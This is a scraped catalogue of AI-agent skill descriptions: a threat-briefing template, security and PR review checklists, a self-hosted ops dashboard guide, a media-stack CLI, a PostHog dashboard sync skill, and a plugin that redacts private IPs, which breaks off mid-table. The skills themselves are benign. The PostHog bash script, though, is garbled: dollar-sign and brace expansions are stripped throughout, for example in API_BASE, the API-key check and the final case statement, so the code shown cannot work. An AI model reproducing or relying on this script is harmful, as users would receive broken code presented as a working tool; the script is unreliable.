@clawhub-solomonneas-65b0d825a2
Generate a daily or weekly cybersecurity threat briefing from open sources. Covers new vulnerabilities, active exploits, ransomware campaigns, APT activity,...
--- name: threat-briefing description: Generate a daily or weekly cybersecurity threat briefing from open sources. Covers new vulnerabilities, active exploits, ransomware campaigns, APT activity, and industry-relevant threats. triggers: - threat briefing - cyber news - security briefing - daily threats - weekly intel --- # Threat Briefing Generate a concise, actionable cybersecurity threat briefing. ## Briefing Structure ### Header ``` # Cybersecurity Threat Briefing **Date:** [today's date] **Period:** Last 24-48 hours | Last 7 days **Analyst:** [agent name] **TLP:** WHITE ``` ### Priority Alerts (if any) Active exploits or critical vulnerabilities requiring immediate action. Include: CVE ID, affected systems, exploitation status, patch availability. ### Top Stories (5-10 items) For each story: ``` ### [N]. [Headline] **Category:** Vulnerability | Ransomware | APT | Supply Chain | Policy | Tool Release **Relevance:** Higher-Ed | SMB | Enterprise | All **Summary:** [2-3 sentences] **Action Required:** [Yes/No] - [what to do if yes] **Source:** [URL] ``` ### Vulnerability Watch New CVEs with CVSS >= 7.0 relevant to common stacks: - Linux/Ubuntu - Windows Server - Network equipment (Cisco, Fortinet, Palo Alto) - Web frameworks (Node.js, Python, PHP) - Cloud services (AWS, Azure, GCP) ### Threat Actor Activity Any notable APT or criminal group activity in the reporting period. Map to MITRE ATT&CK where possible. ### Recommendations Prioritized action items for a small-to-mid security team: 1. [Highest priority action] 2. [Second priority] 3. [Third priority] ## Tailoring - For higher-ed: emphasize student data (FERPA), research IP, BYOD risks - For SMB: emphasize ransomware, business email compromise, supply chain - For SOC operators: emphasize detection rules, IOCs, hunting queries ## Sources to Reference Prefer: CISA KEV, NVD, BleepingComputer, The Record, Krebs on Security, Dark Reading, SecurityWeek, Mandiant/Google TAG, Microsoft MSRC
Review code changes for security vulnerabilities. Checks for OWASP Top 10, secrets exposure, injection flaws, auth issues, and insecure defaults. Use when re...
--- name: security-review description: Review code changes for security vulnerabilities. Checks for OWASP Top 10, secrets exposure, injection flaws, auth issues, and insecure defaults. Use when reviewing PRs, commits, or code diffs. triggers: - security review - check for vulnerabilities - secure code review - OWASP check --- # Security Code Review Review code changes for security vulnerabilities, following OWASP Top 10 and secure coding best practices. ## What to Check ### Injection (SQL, Command, LDAP, XSS) - User input used in queries without parameterization - Template literals in SQL strings - `eval()`, `exec()`, `os.system()` with user input - Unescaped output in HTML templates ### Authentication & Session - Hardcoded credentials or API keys - Weak password requirements - Missing rate limiting on auth endpoints - Session fixation or missing regeneration - JWT without expiration or with weak signing ### Authorization - Missing access control checks on endpoints - IDOR (direct object reference without ownership check) - Role checks that can be bypassed - Privilege escalation paths ### Secrets & Data Exposure - API keys, tokens, passwords in code or configs - Sensitive data in logs - PII without encryption - .env files or secrets committed to git ### Configuration - Debug mode enabled in production - CORS set to wildcard (*) - Missing security headers - Default credentials unchanged - Verbose error messages exposing internals ## Output Format For each finding: ``` **FINDING:** [Title] **Severity:** CRITICAL | HIGH | MEDIUM | LOW **File:** [path:line] **Code:** [the problematic code] **Issue:** [what's wrong] **Fix:** [how to fix it, with code example] **OWASP:** [category reference] ``` ## Rules - Focus on HIGH and CRITICAL findings first - Provide working fix code, not just descriptions - If no security issues found, say so clearly - Note any areas that need manual review (business logic, auth flows)
Comprehensive pull request review covering code quality, security, performance, and maintainability. Use for any code review task.
--- name: pr-review description: Comprehensive pull request review covering code quality, security, performance, and maintainability. Use for any code review task. triggers: - review PR - code review - review changes - review diff --- # Pull Request Review Perform a thorough code review covering quality, security, performance, and maintainability. ## Review Checklist ### Code Quality - Naming: clear, descriptive, consistent with codebase conventions - Functions: single responsibility, reasonable length (<50 lines) - Error handling: all failure paths covered, no swallowed exceptions - Types: proper TypeScript/type annotations where applicable - DRY: no unnecessary duplication - Dead code: nothing unused or commented out ### Security (see also: security-review skill) - No secrets or credentials in code - Input validation on all user-facing endpoints - Parameterized queries (no string concatenation for SQL) - Proper auth/authz checks ### Performance - N+1 query patterns - Missing database indexes for new queries - Unbounded loops or recursive calls - Large payload responses without pagination - Missing caching where appropriate ### Testing - New functionality has tests - Edge cases covered (empty arrays, null, boundaries) - Tests are deterministic (no timing dependencies) - Mocks are appropriate (not over-mocked) ### Maintainability - Changes are documented (README, comments for complex logic) - Breaking changes are noted - Migration path is clear for schema changes - Dependencies added are justified ## Output Format Start with a summary: ``` ## Review Summary **Verdict:** APPROVE | REQUEST_CHANGES | COMMENT **Risk Level:** Low | Medium | High **Key Findings:** [1-3 sentence summary] ``` Then list findings by category, each with: - File and line reference - What the issue is - Suggested fix (with code when helpful) - Severity (blocking vs. nit) End with: ``` ## Positive Notes [Things done well worth calling out] ```
Full operational dashboard for AI agent setups. Cron job calendar, agent intel feeds, security audit panel, network infrastructure map, code search, repo arc...
---
name: ops-deck
version: 1.0.0
description: "Full operational dashboard for AI agent setups. Cron job calendar, agent intel feeds, security audit panel, network infrastructure map, code search, repo architecture viewer, prompt library, and sprint backlog tracker. Built for indie devs, small teams, and CS students running OpenClaw or similar agent stacks."
tags:
- dashboard
- devops
- monitoring
- security
- infrastructure
- agent-tools
- cron
- code-search
- prompt-library
- intel
category: tools
---
# Ops Deck — Full Operational Dashboard
A self-hosted operational dashboard for developers running AI agent stacks. See everything in one place: cron jobs, agent intel, security posture, infrastructure map, code search, and more.
For a simpler setup with just code search and prompt library, see [ops-deck-lite](https://clawhub.com/solomonneas/ops-deck-lite).
## What You Get
### Core Modules
| Module | Port | Description |
|--------|------|-------------|
| **Ops Deck UI** | 5173 | Vite + React dashboard (all modules in one UI) |
| **Ops Deck API** | 8005 | Express backend serving all data endpoints |
| **Code Search** | 5204 | Semantic code search with local embeddings |
| **Prompt Library** | 5202 | Categorized, searchable prompt templates |
### Dashboard Panels
**1. Memory Browser**
Searchable knowledge card viewer. Browse cards by category and tags, read full content with rendered markdown. Cards use YAML frontmatter for metadata (topic, category, tags, dates).
**2. Journal**
Date-based daily log viewer. See which days have entries, click to read. Great for tracking what your agent did each day.
**3. Workspace Config**
Tabbed viewer for your agent configuration files: AGENTS.md, SOUL.md, TOOLS.md, USER.md, MEMORY.md, IDENTITY.md. See your full agent personality and config at a glance.
**4. Cron Job Calendar**
Visual calendar of all scheduled agent tasks. See what runs when, last status, next run, error streaks. Click to view payload and delivery config.
```bash
# The API reads from a cron-jobs.json file, updated by a nightly cron
GET /api/cron-jobs
```
**2. Agent Intel Feed**
Aggregated intelligence from automated research crons. Three categories:
- **Cyber Threats:** CVEs, active exploits, advisories (from CISA, BleepingComputer, etc.)
- **AI Lab Updates:** Model releases, API changes, pricing updates
- **Dev Tooling:** Framework updates, SDK releases, breaking changes
```bash
# Intel entries with category filtering
GET /api/agent-intel
GET /api/agent-intel?category=model-updates
POST /api/agents/intel # Add new intel entry
```
**3. Security Audit Panel**
Live security posture dashboard. Tracks firewall rules, fail2ban status, SSH config, listening ports, AppArmor status, and pending security updates.
```bash
# Security audit data (updated by a daily cron)
GET /api/security-audit
```
Data structure:
```json
{
"lastUpdated": "2026-03-21T04:00:00Z",
"securityControls": [
{"name": "UFW Firewall", "status": "active", "lastChecked": "2026-03-21"},
{"name": "Fail2ban", "status": "active", "bannedIPs": 42},
{"name": "SSH Config", "status": "hardened", "passwordAuth": false}
],
"auditLog": []
}
```
**4. Network Infrastructure Map**
Visual map of your services, ports, and connections. Populated from a JSON config file you maintain manually or generate with your own scripts.
```bash
# Architecture/infrastructure data
GET /api/architecture
```
**5. Code Search** (same as ops-deck-lite)
Semantic search across your entire codebase using local embeddings.
```bash
POST http://localhost:5204/api/search
{"query": "authentication middleware", "mode": "hybrid", "limit": 10}
```
**6. Prompt Library** (same as ops-deck-lite)
Categorized prompt templates. Stop rewriting the same prompts.
```bash
GET /api/prompts # List all
POST /api/prompts # Create new
```
**7. Sprint Backlog Tracker**
Kanban-style task tracking synced with your git repos. Auto-detects progress from recent commits.
```bash
# Backlog data (JSON file, updated by daily cron)
GET /api/backlog
```
## How Data Collection Works
> **The dashboard itself has no system access.** It reads static JSON files that YOU generate separately. The security audit panel, cron calendar, and infrastructure map all display data from JSON files on disk. You control what data goes into those files and how it's collected.
>
> **Example:** The security audit panel reads `security-audit.json`. You can populate this manually, via a cron script you write and review, or skip it entirely. The dashboard never runs `ufw status`, `ss -tlnp`, or any system command on its own.
>
> **No elevated privileges required.** The dashboard services run as a normal user. If you want automated data collection, the setup guide includes example cron scripts that you review and configure yourself.
## Architecture
```
┌──────────────────────────────────────┐
│ Ops Deck UI (:5173) │
│ React + Vite + Tailwind │
│ Panels: Cron | Intel | Security | │
│ Infra | Code | Prompts | Backlog │
└──────────┬───────────────────────────┘
│
┌─────┴─────┐
│ │
┌────▼────┐ ┌───▼────────┐
│ API │ │ Code Search │
│ (:8005) │ │ (:5204) │
│ Express │ │ FastAPI │
└────┬────┘ └─────────────┘
│
┌────▼──────────┐
│ Prompt Library │
│ (:5202) │
│ Express │
└────────────────┘
```
All services are local only. No cloud dependencies. No telemetry.
## Prerequisites
- Node.js 18+
- Python 3.10+ with FastAPI
- Ollama with `qwen3-embedding:8b` (for code search embeddings)
- PM2 (process manager)
- SQLite (no external database needed)
## Setup
### 1. Install dependencies
```bash
npm install -g pm2
pip install fastapi uvicorn aiofiles
ollama pull qwen3-embedding:8b
```
### 2. Create the API server
The Ops Deck API is a lightweight Express server that serves JSON data files and provides CRUD endpoints for intel entries.
```bash
mkdir -p ops-deck-api
cd ops-deck-api
npm init -y
npm install express cors
```
Key endpoints to implement:
```javascript
// server.js
const express = require('express');
const cors = require('cors');
const fs = require('fs');
const app = express();
app.use(cors());
app.use(express.json());
// Cron jobs (read from file, updated by nightly cron)
app.get('/api/cron-jobs', (req, res) => {
const data = JSON.parse(fs.readFileSync('./cron-jobs.json', 'utf8'));
res.json(data);
});
// Agent intel (CRUD)
app.get('/api/agent-intel', (req, res) => { /* ... */ });
app.post('/api/agents/intel', (req, res) => { /* ... */ });
// Security audit (read from file, updated by daily cron)
app.get('/api/security-audit', (req, res) => {
const data = JSON.parse(fs.readFileSync('./security-audit/audit-data.json', 'utf8'));
res.json(data);
});
// Architecture
app.get('/api/architecture', (req, res) => { /* ... */ });
// Backlog
app.get('/api/backlog', (req, res) => {
const data = JSON.parse(fs.readFileSync('./backlog.json', 'utf8'));
res.json(data);
});
app.listen(8005, () => console.log('Ops Deck API on :8005'));
```
### 3. Create the frontend
```bash
npm create vite@latest ops-deck -- --template react-ts
cd ops-deck
npm install
npm install tailwindcss @headlessui/react recharts
```
Build dashboard panels that fetch from the API endpoints. Each panel is a React component:
- `CronCalendar.tsx` - Monthly calendar view of cron jobs
- `IntelFeed.tsx` - Filterable intel card feed
- `SecurityAudit.tsx` - Status cards for each security control
- `InfraMap.tsx` - Service topology visualization
- `CodeSearch.tsx` - Search input with results display
- `PromptLibrary.tsx` - CRUD interface for prompts
- `Backlog.tsx` - Kanban board from backlog.json
### 4. (Optional) Set up data refresh scripts
The dashboard reads static JSON files. You can update them manually or write your own scripts to automate it. Example scripts are provided in the repo's `docs/` directory for reference. Review them before running.
All data collection is opt-in. The dashboard works with the included example data out of the box.
### 5. PM2 ecosystem config
```javascript
// ecosystem.config.cjs
module.exports = {
apps: [
{
name: 'opsdeck',
cwd: './ops-deck',
script: 'node_modules/.bin/vite',
args: '--host --port 5173',
autorestart: true,
},
{
name: 'opsdeck-api',
cwd: './ops-deck-api',
script: 'server.js',
autorestart: true,
},
{
name: 'code-search',
cwd: './code-search',
script: 'server.py',
interpreter: 'python3',
autorestart: true,
},
{
name: 'prompt-library-api',
cwd: './prompt-library/backend',
script: 'server.js',
autorestart: true,
},
]
};
```
```bash
pm2 start ecosystem.config.cjs
pm2 save
pm2 startup # auto-start on boot
```
## Resource Usage
| Service | RAM | CPU | Disk |
|---------|-----|-----|------|
| Ops Deck UI | ~75MB | <1% idle | ~20MB build |
| Ops Deck API | ~85MB | <1% idle | <5MB data |
| Code Search | ~150MB | <1% idle | ~50MB index |
| Prompt Library | ~50MB | <1% idle | <1MB |
| Ollama (shared) | ~4GB | Spikes during indexing | ~4GB model |
Total: ~360MB for all services (Ollama runs independently).
## Customization
The dashboard is yours to extend. Common additions:
- **Social media pipeline** panel (if you run Postiz/n8n)
- **LLM usage tracking** (token counts, costs, model breakdown)
- **Uptime monitoring** (ping your deployed services)
- **Git activity** (commit heatmap, PR status)
## Who This Is For
- **Indie devs** running OpenClaw with multiple cron jobs and services
- **CS students** building a portfolio of operational tools
- **Small teams** who want visibility into their agent infrastructure
- **Homelab enthusiasts** who want a single pane of glass
If you just want code search and prompts, use [ops-deck-lite](https://clawhub.com/solomonneas/ops-deck-lite) instead. This is the full stack.
## Source
https://github.com/solomonneas/ops-deck-oss
Single-file bash CLI for the *arr media stack. Manage Sonarr, Radarr, Prowlarr, qBittorrent, Bazarr, Jellyseerr, and Tdarr from the terminal or via AI agents...
--- name: media-cli-local version: 1.0.0 description: "Single-file bash CLI for the *arr media stack. Manage Sonarr, Radarr, Prowlarr, qBittorrent, Bazarr, Jellyseerr, and Tdarr from the terminal or via AI agents. Runs on the same machine as your services. No Docker, no Node, no Python packages." tags: - media - sonarr - radarr - plex - jellyfin - torrents - automation - homelab - arr category: tools --- # media-cli-local — Terminal Control for Your *arr Media Stack One bash script to manage your entire media automation stack. Search, add, download, and monitor movies and TV shows without touching a web UI. Designed for setups where the agent and media services run on the **same machine**. If your *arr stack runs on a different host, see [media-cli](https://clawhub.com/solomonneas/media-cli) which includes SSH remote support. **Source:** https://github.com/solomonneas/media-cli **Install:** Clone the repo and copy the script to your PATH. Review it first. ```bash git clone https://github.com/solomonneas/media-cli.git cd media-cli cp media ~/bin/media && chmod +x ~/bin/media media setup ``` ## Supported Services | Service | Required | What It Does | |---------|----------|-------------| | Sonarr | Yes | TV show management | | Radarr | Yes | Movie management | | Prowlarr | Yes | Indexer management | | qBittorrent | Yes | Download monitoring | | Bazarr | Optional | Subtitles | | Jellyseerr | Optional | User requests + trending | | Tdarr | Optional | Transcode monitoring | ## Setup The setup wizard asks for API URLs and keys, saves to `~/.config/media-cli/config` (chmod 600). All connections are localhost only. ```bash media setup # Interactive config wizard media status # Verify everything connects ``` ## Commands ### Movies ```bash media movies search "Interstellar" # Search online media movies add "Interstellar" # Add + start downloading media movies list # Library with download status media movies missing # Monitored without files media movies remove "title" # Remove (keeps files) ``` ### TV Shows ```bash media shows search "Breaking Bad" # Search online media shows add "Breaking Bad" # Add + search episodes media shows list # Library with episode counts ``` ### Downloads ```bash media downloads # All torrents by state media downloads active # Active with speed + ETA media downloads pause <hash|all> media downloads resume <hash|all> media downloads remove <hash> [true] # true = delete files too ``` ### Status & Monitoring ```bash media status # Health + library counts + active downloads media queue # Sonarr/Radarr download queues media wanted # Missing episodes + movies media calendar 14 # Upcoming releases (next N days) media history # Recent activity media refresh # Trigger library rescan media indexers # Prowlarr indexer status ``` ### Subtitles (Bazarr) ```bash media subs # Wanted subtitles media subs history # Recent subtitle downloads ``` ### Requests (Jellyseerr) ```bash media requests # Pending user requests media requests trending # What's trending media requests users # User list with request counts ``` ### Transcoding (Tdarr) ```bash media tdarr # Status + active workers media tdarr workers # Per-file progress: %, fps, ETA media tdarr queue # Items queued for processing ``` ## AI Agent Integration Commands output clean, parseable text designed for AI agents: ``` "What shows am I missing episodes for?" → media wanted "Add Succession" → media shows add "Succession" "What's downloading right now?" → media downloads active "Pause all downloads" → media downloads pause all ``` Works with OpenClaw, LangChain, Claude computer use, or any agent framework with shell execution. ## Requirements - bash 4.0+ - curl - python3 (standard library only, no pip) ## Technical Details - Single bash script (~900 lines) - All API calls go to localhost (no remote connections) - Talks to *arr v3 APIs (Sonarr/Radarr), v1 (Prowlarr), v2 (qBittorrent WebUI) - Python3 used strictly for JSON parsing (standard library) - No telemetry, no analytics, no network calls except to your own services - Config stored at `~/.config/media-cli/config` with chmod 600
Automate PostHog dashboard creation, sync, update, and export via API. Covers dashboard CRUD, insight creation, cohort management, and API-driven analytics w...
---
name: posthog-analytics
description: "Automate PostHog dashboard creation, sync, update, and export via API. Covers dashboard CRUD, insight creation, cohort management, and API-driven analytics workflows."
version: 1.2.0
env:
- name: POSTHOG_PERSONAL_API_KEY
required: true
description: "PostHog personal API key with read/write access"
- name: POSTHOG_HOST
required: false
default: "us.i.posthog.com"
description: "PostHog API host (EU: eu.i.posthog.com)"
- name: POSTHOG_UI_HOST
required: false
default: "us.posthog.com"
description: "PostHog UI host for dashboard URLs"
---
# PostHog Analytics Skill
Automate PostHog dashboard creation, sync, update, and export via API.
## Prerequisites
### Required Tools
- `curl` - HTTP client (pre-installed on macOS/Linux)
- `jq` - JSON processor: `brew install jq` or `apt install jq`
- `bash` - Shell (the script is bash)
### PostHog API Key
1. Go to [PostHog Settings → Personal API Keys](https://us.posthog.com/settings/user-api-keys)
2. Create a new key with read/write access
3. Export it:
```bash
export POSTHOG_PERSONAL_API_KEY=phx_xxx
```
**Note**: The API key determines your organization and project. The script uses `@current` project context (your default project).
### Verify Setup
```bash
# Test your API key - should return your project info
curl -s -H "Authorization: Bearer $POSTHOG_PERSONAL_API_KEY" \
"https://us.i.posthog.com/api/projects/@current/" | jq '{id, name}'
```
Expected output:
```json
{
"id": 209268,
"name": "Default project"
}
```
If you get an error, check your API key is correct and has proper permissions.
## Quick Start: Blog Analytics Example
### Step 1: Write Your Config
Create `blog_dashboard.json`:
```json
{
"name": "Blog Analytics",
"description": "Track blog performance and reader engagement",
"filter": {"key": "source", "value": "blog"},
"dashboard_id": null,
"insights": [
{"name": "Blog Pageviews (Total)", "type": "pageviews_total"},
{"name": "Unique Blog Readers", "type": "unique_users"},
{"name": "Blog Traffic Trend", "type": "traffic_trend"},
{"name": "Top Blog Posts", "type": "top_pages"}
]
}
```
**Note**: Set `dashboard_id: null` for new dashboards.
### Step 2: Create Dashboard
```bash
./scripts/posthog_sync.sh create blog_dashboard.json
```
**Output**:
```
Creating dashboard: Blog Analytics
Dashboard created: ID 1166599
Creating insight: Blog Pageviews (Total)
{id: 6520531, name: "Blog Pageviews (Total)"}
...
Dashboard URL: https://us.posthog.com/project/209268/dashboard/1166599
```
The script:
- Creates a new dashboard in your PostHog project
- Returns **dashboard_id** (e.g., `1166599`) and **project_id** (e.g., `209268`) in the URL
- **Automatically updates** your config file with the `dashboard_id`
### Step 3: Add New Insights (Sync)
Edit config to add new insights, then:
```bash
./scripts/posthog_sync.sh sync blog_dashboard.json
```
Only creates NEW insights. Existing ones (matched by name) are **skipped**.
### Step 4: Update Existing Insights
Changed your filter? Edit config, then:
```bash
./scripts/posthog_sync.sh update blog_dashboard.json
```
Updates ALL insights with current config settings. Use when changing filters.
### Step 5: Export Existing Dashboard
```bash
./scripts/posthog_sync.sh export 1166599 > exported_dashboard.json
```
## Config Reference
| Field | Required | Description |
|-------|----------|-------------|
| `name` | Yes | Dashboard name |
| `description` | No | Dashboard description |
| `filter` | No* | Event property filter: `{"key": "source", "value": "blog"}` |
| `domain_filter` | No* | URL filter fallback: `"blog.sylph.ai"` |
| `dashboard_id` | No | Set to `null` for create, or existing ID for sync/update |
| `insights` | Yes | Array of insight objects |
*At least one filter recommended. `filter` takes precedence over `domain_filter`.
### Insight Types
| Type | Display | Description |
|------|---------|-------------|
| `pageviews_total` | BoldNumber | Total pageview count |
| `unique_users` | BoldNumber | Unique visitors (DAU) |
| `traffic_trend` | LineGraph | Traffic over time |
| `top_pages` | Table | Top pages breakdown |
### Optional Insight Fields
| Field | Default | Options |
|-------|---------|---------|
| `math` | `total` | `total`, `dau`, `weekly_active`, `monthly_active` |
| `display` | Auto | `BoldNumber`, `ActionsLineGraph`, `ActionsTable` |
| `date_range` | `-30d` | `-7d`, `-30d`, `-90d`, etc. |
## Environment Variables
| Variable | Required | Default | Description |
|----------|----------|---------|-------------|
| `POSTHOG_PERSONAL_API_KEY` | Yes | - | Your API key (determines org/project) |
| `POSTHOG_HOST` | No | us.i.posthog.com | API host (EU: eu.i.posthog.com) |
| `POSTHOG_UI_HOST` | No | us.posthog.com | UI host for dashboard URLs |
## Files
- `scripts/posthog_sync.sh` - CLI script (create/sync/update/export)
- `examples/blog_dashboard.json` - Example config
## References
- [PostHog API Docs](https://posthog.com/docs/api)
- [Personal API Keys](https://posthog.com/docs/api/overview#personal-api-keys)
FILE:examples/blog_dashboard.json
{
"name": "Blog Analytics",
"description": "Track blog performance and reader engagement",
"filter": {"key": "source", "value": "blog"},
"dashboard_id": null,
"insights": [
{"name": "Blog Pageviews (Total)", "type": "pageviews_total"},
{"name": "Unique Blog Readers", "type": "unique_users"},
{"name": "Blog Traffic Trend", "type": "traffic_trend"},
{"name": "Top Blog Posts", "type": "top_pages"}
]
}
FILE:scripts/posthog_sync.sh
#!/usr/bin/env bash
# posthog_sync.sh - PostHog dashboard management CLI
# Usage: posthog_sync.sh <create|sync|update|export> <config.json|dashboard_id>
set -euo pipefail
: "?Set POSTHOG_PERSONAL_API_KEY"
POSTHOG_HOST="-us.i.posthog.com"
POSTHOG_UI_HOST="-us.posthog.com"
API_BASE="https://POSTHOG_HOST/api/projects/@current"
command -v jq >/dev/null 2>&1 || { echo "Error: jq is required. Install with: brew install jq / apt install jq" >&2; exit 1; }
api() {
local method="$1" endpoint="$2"; shift 2
curl -sS -X "$method" "API_BASEendpoint" \
-H "Authorization: Bearer POSTHOG_PERSONAL_API_KEY" \
-H "Content-Type: application/json" "$@"
}
get_project_id() {
api GET "/" | jq -r '.id'
}
# Map insight type to PostHog event query
build_insight_payload() {
local name="$1" type="$2" filter_json="$3" domain="$4" math="-total" display="-" date_range="--30d"
local event='$pageview'
local properties="[]"
if [[ -n "$filter_json" && "$filter_json" != "null" ]]; then
local fkey fval
fkey=$(echo "$filter_json" | jq -r '.key')
fval=$(echo "$filter_json" | jq -r '.value')
properties=$(jq -n --arg k "$fkey" --arg v "$fval" '[{"key":$k,"value":$v,"type":"event"}]')
elif [[ -n "$domain" && "$domain" != "null" ]]; then
properties=$(jq -n --arg d "$domain" '[{"key":"$current_url","value":$d,"operator":"icontains","type":"event"}]')
fi
local insight_math="$math"
case "$type" in
pageviews_total) display="-BoldNumber"; insight_math="total" ;;
unique_users) display="-BoldNumber"; insight_math="dau" ;;
traffic_trend) display="-ActionsLineGraph"; insight_math="total" ;;
top_pages) display="-ActionsTable"; insight_math="total"
properties=$(echo "$properties" | jq '. + [{"key":"$current_url","type":"event"}]')
;;
esac
jq -n \
--arg name "$name" \
--arg display "$display" \
--arg math "$insight_math" \
--arg date_from "$date_range" \
--arg event "$event" \
--argjson properties "$properties" \
'{
name: $name,
query: {
kind: "EventsQuery",
select: ["*"],
event: $event,
properties: $properties,
math: $math,
after: $date_from
},
filters: {
insight: "TRENDS",
events: [{id: $event, math: $math, properties: $properties}],
display: $display,
date_from: $date_from
}
}'
}
cmd_create() {
local config_file="$1"
[[ -f "$config_file" ]] || { echo "Error: Config file not found: $config_file" >&2; exit 1; }
local name description filter domain
name=$(jq -r '.name' "$config_file")
description=$(jq -r '.description // ""' "$config_file")
filter=$(jq -c '.filter // null' "$config_file")
domain=$(jq -r '.domain_filter // null' "$config_file")
echo "Creating dashboard: $name"
local dash_result
dash_result=$(api POST "/dashboards/" -d "$(jq -n --arg n "$name" --arg d "$description" '{name:$n, description:$d}')")
local dash_id
dash_id=$(echo "$dash_result" | jq -r '.id')
if [[ -z "$dash_id" || "$dash_id" == "null" ]]; then
echo "Error: Failed to create dashboard" >&2
echo "$dash_result" >&2
exit 1
fi
echo "Dashboard created: ID $dash_id"
# Update config with dashboard_id
local tmp
tmp=$(mktemp)
jq --argjson id "$dash_id" '.dashboard_id = $id' "$config_file" > "$tmp" && mv "$tmp" "$config_file"
# Create insights
local insight_count
insight_count=$(jq '.insights | length' "$config_file")
for (( i=0; i<insight_count; i++ )); do
local iname itype imath idisplay irange
iname=$(jq -r ".insights[$i].name" "$config_file")
itype=$(jq -r ".insights[$i].type" "$config_file")
imath=$(jq -r ".insights[$i].math // \"total\"" "$config_file")
idisplay=$(jq -r ".insights[$i].display // \"\"" "$config_file")
irange=$(jq -r ".insights[$i].date_range // \"-30d\"" "$config_file")
echo "Creating insight: $iname"
local payload
payload=$(build_insight_payload "$iname" "$itype" "$filter" "$domain" "$imath" "$idisplay" "$irange")
payload=$(echo "$payload" | jq --argjson did "$dash_id" '. + {dashboards: [$did]}')
local result
result=$(api POST "/insights/" -d "$payload")
echo "$result" | jq '{id: .id, name: .name}'
done
local project_id
project_id=$(get_project_id)
echo "Dashboard URL: https://POSTHOG_UI_HOST/project/project_id/dashboard/dash_id"
}
cmd_sync() {
local config_file="$1"
[[ -f "$config_file" ]] || { echo "Error: Config file not found: $config_file" >&2; exit 1; }
local dash_id
dash_id=$(jq -r '.dashboard_id' "$config_file")
[[ "$dash_id" != "null" && -n "$dash_id" ]] || { echo "Error: dashboard_id is null. Run create first." >&2; exit 1; }
local filter domain
filter=$(jq -c '.filter // null' "$config_file")
domain=$(jq -r '.domain_filter // null' "$config_file")
# Get existing insights on this dashboard
local existing
existing=$(api GET "/dashboards/dash_id/" | jq -r '[.tiles[].insight.name] | .[]' 2>/dev/null || echo "")
local insight_count
insight_count=$(jq '.insights | length' "$config_file")
local created=0
for (( i=0; i<insight_count; i++ )); do
local iname itype imath idisplay irange
iname=$(jq -r ".insights[$i].name" "$config_file")
itype=$(jq -r ".insights[$i].type" "$config_file")
imath=$(jq -r ".insights[$i].math // \"total\"" "$config_file")
idisplay=$(jq -r ".insights[$i].display // \"\"" "$config_file")
irange=$(jq -r ".insights[$i].date_range // \"-30d\"" "$config_file")
if echo "$existing" | grep -qF "$iname"; then
echo "Skipping (exists): $iname"
continue
fi
echo "Creating insight: $iname"
local payload
payload=$(build_insight_payload "$iname" "$itype" "$filter" "$domain" "$imath" "$idisplay" "$irange")
payload=$(echo "$payload" | jq --argjson did "$dash_id" '. + {dashboards: [$did]}')
api POST "/insights/" -d "$payload" | jq '{id: .id, name: .name}'
created=$((created + 1))
done
echo "Sync complete: $created new insights created"
}
cmd_update() {
local config_file="$1"
[[ -f "$config_file" ]] || { echo "Error: Config file not found: $config_file" >&2; exit 1; }
local dash_id
dash_id=$(jq -r '.dashboard_id' "$config_file")
[[ "$dash_id" != "null" && -n "$dash_id" ]] || { echo "Error: dashboard_id is null." >&2; exit 1; }
local filter domain
filter=$(jq -c '.filter // null' "$config_file")
domain=$(jq -r '.domain_filter // null' "$config_file")
# Get existing insights
local tiles
tiles=$(api GET "/dashboards/dash_id/" | jq '[.tiles[] | {id: .insight.id, name: .insight.name}]')
local insight_count
insight_count=$(jq '.insights | length' "$config_file")
local updated=0
for (( i=0; i<insight_count; i++ )); do
local iname itype imath idisplay irange
iname=$(jq -r ".insights[$i].name" "$config_file")
itype=$(jq -r ".insights[$i].type" "$config_file")
imath=$(jq -r ".insights[$i].math // \"total\"" "$config_file")
idisplay=$(jq -r ".insights[$i].display // \"\"" "$config_file")
irange=$(jq -r ".insights[$i].date_range // \"-30d\"" "$config_file")
local insight_id
insight_id=$(echo "$tiles" | jq -r --arg n "$iname" '.[] | select(.name == $n) | .id')
if [[ -z "$insight_id" ]]; then
echo "Not found (skipping): $iname"
continue
fi
echo "Updating insight: $iname (ID: $insight_id)"
local payload
payload=$(build_insight_payload "$iname" "$itype" "$filter" "$domain" "$imath" "$idisplay" "$irange")
api PATCH "/insights/insight_id/" -d "$payload" | jq '{id: .id, name: .name}'
updated=$((updated + 1))
done
echo "Update complete: $updated insights updated"
}
cmd_export() {
local dash_id="$1"
local dash
dash=$(api GET "/dashboards/dash_id/")
echo "$dash" | jq '{
name: .name,
description: .description,
dashboard_id: .id,
insights: [.tiles[] | {
name: .insight.name,
type: "custom",
filters: .insight.filters
}]
}'
}
# --- Main ---
case "-help" in
create) shift; cmd_create "$@" ;;
sync) shift; cmd_sync "$@" ;;
update) shift; cmd_update "$@" ;;
export) shift; cmd_export "$@" ;;
help|--help|-h)
echo "Usage: posthog_sync.sh <create|sync|update|export> <config.json|dashboard_id>"
echo ""
echo "Commands:"
echo " create <config.json> Create dashboard + insights"
echo " sync <config.json> Add new insights (skip existing)"
echo " update <config.json> Update all insights with current config"
echo " export <dashboard_id> Export dashboard to JSON config"
;;
*) echo "Unknown command: $1" >&2; exit 1 ;;
esac
OpenClaw plugin that scrubs private infrastructure details from outgoing messages. Regex-based redaction of RFC 1918 IPs, localhost ports, SSH targets, and h...
--- name: content-scrubber version: 1.0.0 description: "OpenClaw plugin that scrubs private infrastructure details from outgoing messages. Regex-based redaction of RFC 1918 IPs, localhost ports, SSH targets, and hostnames before they reach Discord, Telegram, or other messaging surfaces." --- # Content Scrubber An OpenClaw extension plugin that intercepts outgoing messages and redacts private infrastructure details before delivery. ## What It Catches - **RFC 1918 IPv4 addresses**: 10.x.x.x, 172.16-31.x.x, 192.168.x.x - **Loopback addresses**: 127.x.x.x - **localhost with ports**: localhost:8080, localhost:3000, etc. - **SSH/SCP targets**: [email protected]:/path - **Custom hostnames**: configurable hostname patterns ## How It Works The plugin registers as a message interceptor. Before any message leaves OpenClaw (Discord, Telegram, Signal, etc.), it runs through regex-based scrubbing rules that replace private details with safe placeholders like `[redacted-ip]`, `[redacted-service]`, `[redacted-target]`. Rules are deterministic (regex, not LLM), so they're fast, auditable, and never miss edge cases that an LLM scrubber would. ## Installation 1. Copy the plugin files to your OpenClaw extensions directory: ``` ~/.openclaw/extensions/content-scrubber/ ├── index.ts ├── openclaw.plugin.json └── package.json ``` 2. Add to your `openclaw.json` plugins config: ```json { "plugins": { "entries": { "content-scrubber": { "enabled": true, "config": { "dryRun": false, "allowedRecipients": [] } } } } } ``` 3. Restart OpenClaw. ## Configuration | Option | Type | Default | Description | |--------|------|---------|-------------| | `dryRun` | boolean | false | Log what would be 